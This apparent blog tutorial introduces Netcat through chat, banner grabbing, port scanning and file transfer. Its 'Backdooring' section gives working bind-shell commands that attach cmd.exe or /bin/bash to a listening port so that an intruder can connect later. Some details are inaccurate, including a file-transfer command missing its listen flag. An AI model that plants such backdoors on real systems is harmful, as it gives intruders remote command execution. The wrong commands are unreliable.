Linux , InfoSec , Technology and Everything Else

Published: 6 months ago

Let’s Learn about Netcat

I am sure that if you are a person who has interest in playing around with network you must have heard about Netcat
Netcat is simple utility reads and writes data across TCP or UDP network connections , It was released back in 1995 and has remained popular till today.Despite being popular it is not maintained but a different tool ncat has brought several serious updates to it but here we’ll talk about old swiss knife netcat
What can it be used for ?
Messaging Server-By using Netcat, an operator can redirect simple text between
two computers in a simplistic chat .
File Transfers-Netcat allows you to transfer files between computers.
Banner Grabbing-Netcat allows an operator to establish a socket to a specific
port to potentially identify the operating system, service, version, and other information necessary to enumerate the purpose and/or potential loophole
Port Scanning-Netcat allows the operator to utilize a rudimentary port scanning
function, whereby a port or series of ports can be scanned to determine if the
port is open or closed

Most Unix based system come preinstalled with this utility,However you can also download and compile it from HERE.You can use it on windows too (DOWNLOAD)

Sending Message

I will be using a virtual machine to demonstrate this which has BlachArch Linux on it configured on Bridged Networking

Launch a terminal or command promt(windows) in this case listener operating system is Blackarch as in
Type in the following command:
nc -vlp 8080
This command opens listener on port 8080
now to connect you need to have ip address of listener in my case it’s 192.168.1.4
type the following command to connect to listener
nc 192.168.1.4 8080
when it’s connected try to send message either from either of connected machines , it might look something like
http://i.imgur.com/xITPJqb.png?1

Banner Grabbing

We can use netcat to grab information about running services on specific ports on a host , to grab banner fire up terminal and issue this command

for webserver

nc <host> <port>

GET / HTTP/1.0
[enter]
[enter]

you might get something like

HTTP/1.0 200 OK
Date: Mon, 03 Feb 2014 07:29:47 GMT
Server: Apache/2.2.14 (Ubuntu)
Content-Length: 312
Connection: close
Content-Type: text/html; charset=iso-8859-1

to grab banner of other port/services use this , I here grabbed banner of my local server

nc -v -n <ip> <port>

i ran this on my local ssh server and it gave output as

ketan@neX:~$ nc -v -n 127.0.0.1 22
(UNKNOWN) [127.0.0.1] 22 (ssh) open
SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu3.1.IS.10.04

Backdooring

Interestingly netcat can also be used for backdooring , there are many reverse shell script that can be used to bind on port so that hacker can connect it later but here we’ll use netcat for both listening and connecting

if target is window you can use

nc -vlp 8080 -e cmd.exe

it will execute cmd.exe when it’s connected by other machine

and if it’s unix you can use

nc -vlp 8080 -e /bin/bash

to connect simply use netcat to connect on port 8080 as in this case
nc <ip> <port>

and then after that we can simple execute system commands in netcat

http://i.imgur.com/HDT3ITe.png?1

PortScanning

 

When most people think of port scanners and port scanning capabilities, they generally
don’t think of Netcat in the same vein as tools like Nmap, Angry IP Scanner, or Foundstone’s
SuperScan. However, Netcat can perform basic port scanning capabilities and even offers the

ability to obfuscate the source of the port scan.

to port scan type this command in terminal

nc -v -w 1 <host> -z <ip range>
for example i ran it on my router and it gave out this output

nc -v -w 1 192.168.1.1 -z 1-100
ZXDSL [192.168.1.1] 80 (http) open
ZXDSL [192.168.1.1] 23 (telnet) open
ZXDSL [192.168.1.1] 22 (ssh) open
ZXDSL [192.168.1.1] 21 (ftp) open

 

The -v is for verbosity, which in our port scan indicates the open ports that the port scan uncovers. The -w parameter instructs Netcat to wait for one second between scan attempts, or in other words, indicates how long it needs to wait for a port to respond as being open or closed. Next is the target we want to scan, which in this example is 192.168.1.1 , -z switch is new, and indicates that Netcat should operate in zero I/O mode. Zero I/O mode, in this case, speeds up the process of executing the port scan by ignoring any latency baked in by the program to account for delays by the CPU. Finally, we specify range which in this case is 1-100

Sending Files

netcat can be used to send files between server and client without hassle of setting up ftp server and simply using few lines of command

start the listener server by following command , make sure file which is database.file here is in directory from where command was executed
nc -v -w 30 -p <port>   > database.file
and on the client side:
nc -v -w 2 <ip> <port>  < database.file

 

So I Hope you enjoyed this post , if you want to tell me anything you can use comments :D

 

Have a Comment?

Some HTML is OK